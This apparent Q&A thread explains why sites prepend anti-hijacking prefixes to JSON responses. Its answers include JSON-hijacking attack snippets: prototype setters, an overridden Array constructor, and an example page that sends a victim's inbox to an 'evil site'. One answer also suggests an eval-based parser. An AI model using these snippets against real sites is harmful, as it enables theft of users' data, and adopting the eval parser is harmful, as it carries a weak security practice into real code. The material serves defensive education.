Why do people put code like "throw 1; <dont be evil>" and "for(;;);" in front of json responses? [duplicate]

Possible Duplicate:
Why does Google prepend while(1); to their JSON responses?

Google returns json like this:

throw 1; <dont be evil> { foo: bar}

and Facebooks ajax has json like this:

for(;;); {"error":0,"errorSummary": ""}
  • Why do they put code that would stop execution and makes invalid json?
  • How do they parse it if it's invalid and would crash if you tried to eval it?
  • Do they just remove it from the string (seems expensive)?
  • Are there any security advantages to this?

In response to it being for security purposes:

If the scraper is on another domain they would have to use a script tag to get the data because XHR won't work cross-domain. Even without the for(;;); how would the attacker get the data? It's not assigned to a variable so wouldn't it just be garbage collected because there's no references to it?

Basically to get the data cross domain they would have to do

<script src="http://target.com/json.js"></script>

But even without the crash script prepended the attacker can't use any of the Json data without it being assigned to a variable that you can access globally (it isn't in these cases). The crash code effectivly does nothing because even without it they have to use server sided scripting to use the data on their site.


Solution 1:

Even without the for(;;); how would the attacker get the data?

Attacks are based on altering the behaviour of the built-in types, in particular Object and Array, by altering their constructor function or its prototype. Then when the targeted JSON uses a {...} or [...] construct, they'll be the attacker's own versions of those objects, with potentially-unexpected behaviour.

For example, you can hack a setter-property into Object, that would betray the values written in object literals:

Object.prototype.__defineSetter__('x', function(x) {
    alert('Ha! I steal '+x);
});

Then when a <script> was pointed at some JSON that used that property name:

{"x": "hello"}

the value "hello" would be leaked.

The way that array and object literals cause setters to be called is controversial. Firefox removed the behaviour in version 3.5, in response to publicised attacks on high-profile web sites. However at the time of writing Safari (4) and Chrome (5) are still vulnerable to this.

Another attack that all browsers now disallow was to redefine constructor functions:

Array= function() {
    alert('I steal '+this);
};

[1, 2, 3]

And for now, IE8's implementation of properties (based on the ECMAScript Fifth Edition standard and Object.defineProperty) currently does not work on Object.prototype or Array.prototype.

But as well as protecting past browsers, it may be that extensions to JavaScript cause more potential leaks of a similar kind in future, and in that case chaff should protect against those too.

Solution 2:

Consider that, after checking your GMail account, that you go visit my evil page:

<script type="text/javascript">
Object = function() {
  ajaxRequestToMyEvilSite(JSON.serialize(this));
}
</script>
<script type="text/javascript" src="http://gmail.com/inbox/listMessage"></script>

What will happen now is that the Javascript code that comes from Google -- which the asker thought would be benign and immediately fall out of scope -- will actually be posted to my evil site. Suppose that the URL requested in the script tag sends (because your browser will present the proper cookie, Google will correctly think that you are logged in to your inbox):

({
  messages: [
    {
      id: 1,
      subject: 'Super confidential information',
      message: 'Please keep this to yourself: the password is 42'
    },{
      id: 2,
      subject: 'Who stole your password?',
      message: 'Someone knows your password! I told you to keep this information to yourself! And by this information I mean: the password is 42'
    }
  ]
})

Now, I will be posting a serialized version of this object to my evil server. Thank you!

The way to prevent this from happening is to cruft up your JSON responses, and decruft them when you, from the same domain, can manipulate that data. If you like this answer, please accept the one posted by bobince.

Solution 3:

EDIT

These strings are commonly referred to as an "unparseable cruft" and they are used to patch an information leakage vulnerability that affects the JSON specification. This attack is real world and a vulnerability in gmail was discovered by Jeremiah Grossman. Mozilla also believes this to be a vulnerability in the JSON specification and it has been patched in Firefox 3. However because this issue still affects other browsers this "unparseable cruft" is required because it is a compatible patch.

Bobice's answer has a technical explanation of this attack and it is correct.

Solution 4:

How do they parse it if it's invalid and would crash if you tried to eval it?

It's a feature that it would crash if you tried to eval it. eval allows arbitary JavaScript code, which could be used for a cross-site scripting attack.

Do they just remove it from the string (seems expensive)?

I imagine so. Probably something like:

function parseJson(json) {
   json = json.replace("throw 1; <dont be evil>", "");
   if (/* regex to validate the JSON */) {
       return eval(json);
   } else {
       throw "XSS";
   }
}

The "don't be evil" cruft prevents developers from using eval directly instead of a more secure alternative.